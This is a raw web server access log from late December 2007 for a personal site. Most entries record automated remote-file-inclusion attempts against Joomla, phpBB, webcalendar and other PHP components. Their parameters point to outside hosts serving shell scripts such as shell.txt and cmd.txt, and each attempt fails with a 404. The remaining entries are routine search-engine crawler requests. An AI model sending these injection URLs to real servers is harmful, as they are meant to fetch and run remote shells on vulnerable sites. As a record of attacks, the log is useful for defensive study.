4.79.181.233 - - [29/Dec/2007:19:13:26 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.233 - - [29/Dec/2007:19:13:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.98.148.56 - - [29/Dec/2007:19:14:28 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [29/Dec/2007:19:14:28 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [29/Dec/2007:19:14:28 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.148.56 - - [29/Dec/2007:19:14:32 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.gulzarii.com/myfolder/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.252.99.50 - - [29/Dec/2007:19:16:22 -0800] "GET /logs/access_071222.log/account.php?action=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.252.99.50 - - [29/Dec/2007:19:16:23 -0800] "GET /account.php?action=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.252.99.50 - - [29/Dec/2007:19:16:23 -0800] "GET /logs/account.php?action=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.111.62.80 - - [29/Dec/2007:19:22:57 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.201 - - [29/Dec/2007:19:23:38 -0800] "GET /logs/access_071125.log HTTP/1.0" 200 42156 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.111.62.80 - - [29/Dec/2007:19:29:22 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.111.62.80 - - [29/Dec/2007:19:29:22 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.bmssounds.de/malzfreunde/joomla/components/com_simpleboard/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
67.19.228.114 - - [29/Dec/2007:19:33:23 -0800] "GET /!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [29/Dec/2007:19:33:24 -0800] "GET /!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.47.76.206 - - [29/Dec/2007:19:45:24 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.47.76.206 - - [29/Dec/2007:19:45:24 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:19:47:36 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:19:47:37 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:19:47:37 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.2.242 - - [29/Dec/2007:19:50:25 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:19:56:38 -0800] "GET /logs/access_071214.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:19:56:39 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:19:56:39 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:19:56:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:19:56:54 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:19:59:35 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:19:59:35 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:00:10 -0800] "GET /logs/modifyform.html?code=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:00:10 -0800] "GET /modifyform.html?code=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.35 - - [29/Dec/2007:20:01:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.105 - - [29/Dec/2007:20:01:05 -0800] "GET /tmp/?N=D HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:01:52 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:04:51 -0800] "GET /logs/modifyform.html?code=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:04:51 -0800] "GET /modifyform.html?code=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:04:54 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:20:04:54 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:07:10 -0800] "GET /minamijewelry/source_images/?S=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:12:14 -0800] "GET /minamijewelry/source_images/?M=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.63.186 - - [29/Dec/2007:20:16:52 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [29/Dec/2007:20:16:53 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [29/Dec/2007:20:16:53 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.28.112.181 - - [29/Dec/2007:20:18:57 -0800] "GET /modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.28.112.181 - - [29/Dec/2007:20:18:57 -0800] "GET /logs/modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:23:15 -0800] "GET /minamijewelry/source_images/updated1/ HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.20.73 - - [29/Dec/2007:20:31:00 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.115.50 - - [29/Dec/2007:20:32:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.50 - - [29/Dec/2007:20:32:50 -0800] "GET /logs/access_071012.log HTTP/1.0" 200 75692 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:20:35:29 -0800] "GET /logs/access_071124.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:20:35:29 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:20:35:29 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:20:35:32 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.86 - - [29/Dec/2007:20:36:50 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:47:26 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:20:48:13 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:20:48:13 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.145 - - [29/Dec/2007:20:48:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
74.6.19.219 - - [29/Dec/2007:20:48:28 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:49:18 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:20:52:41 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:20:52:48 -0800] "GET /logs/access_071214.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:20:52:48 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:20:52:48 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:21:01:45 -0800] "GET /logs/ HTTP/1.0" 200 27806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.28.112.181 - - [29/Dec/2007:21:01:49 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.28.112.181 - - [29/Dec/2007:21:01:50 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:21:06:36 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:21:06:36 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [29/Dec/2007:21:06:37 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.115.73 - - [29/Dec/2007:21:14:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.73 - - [29/Dec/2007:21:14:09 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 12137 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:16:12 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:16:12 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:20:42 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:20:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:21:22:02 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:26:10 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:26:10 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:26:52 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:26:52 -0800] "GET /convert/mvcw.php?vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.21 - - [29/Dec/2007:21:29:28 -0800] "GET /funny/?N=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:21:32:13 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:32:25 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.185.82 - - [29/Dec/2007:21:32:25 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://pyta.za.pl/shell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.86 - - [29/Dec/2007:21:34:24 -0800] "GET /logs/access_071216.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.86 - - [29/Dec/2007:21:34:24 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://my3dwork.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:21:35:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.163 - - [29/Dec/2007:21:35:25 -0800] "GET /minamijewelry/source_images/?N=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.254.132.6 - - [29/Dec/2007:21:43:47 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.254.132.6 - - [29/Dec/2007:21:43:47 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.119.195.61 - - [29/Dec/2007:21:43:47 -0800] "GET /logs/access_071214.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.195.61 - - [29/Dec/2007:21:43:48 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.119.195.61 - - [29/Dec/2007:21:43:48 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.10.8 - - [29/Dec/2007:21:44:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.10.8 - - [29/Dec/2007:21:44:48 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.10.8 - - [29/Dec/2007:21:46:15 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.228.114 - - [29/Dec/2007:21:51:51 -0800] "GET /!scanftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [29/Dec/2007:21:51:51 -0800] "GET /!scanftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.52.143.16 - - [29/Dec/2007:21:56:33 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
81.52.143.16 - - [29/Dec/2007:21:56:35 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
207.44.132.10 - - [29/Dec/2007:22:02:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.132.10 - - [29/Dec/2007:22:02:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.132.10 - - [29/Dec/2007:22:02:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.132.10 - - [29/Dec/2007:22:02:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:22:04:25 -0800] "GET /logs/access_071214.log//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:22:04:25 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.35.118 - - [29/Dec/2007:22:04:25 -0800] "GET /logs//webcalendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/oo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:22:07:21 -0800] "GET /minamijewelry/source_images/?D=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.247.149 - - [29/Dec/2007:22:07:33 -0800] "GET /bikes/dteel/WeSTOC07/IMG_3487.JPG HTTP/1.1" 200 3500654 "http://www.st-owners.com/forums/private.php?do=showpm&pmid=140739" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
67.19.159.20 - - [29/Dec/2007:22:13:28 -0800] "GET //calendar/tools/send_reminders.php?noSet=0&includedir=http://mysunsethouse-lombok.com/images/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:22:13:40 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:22:17:13 -0800] "GET /logs/access_071214.log//calendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:22:17:14 -0800] "GET //calendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:22:17:14 -0800] "GET /logs//calendar/tools/send_reminders.php?noSet=0&includedir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.159.20 - - [29/Dec/2007:22:17:15 -0800] "GET /logs/access_071214.log//calendar/tools/send_reminders.php?noSet=0&includedir=http://mysunsethouse-lombok.com/images/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
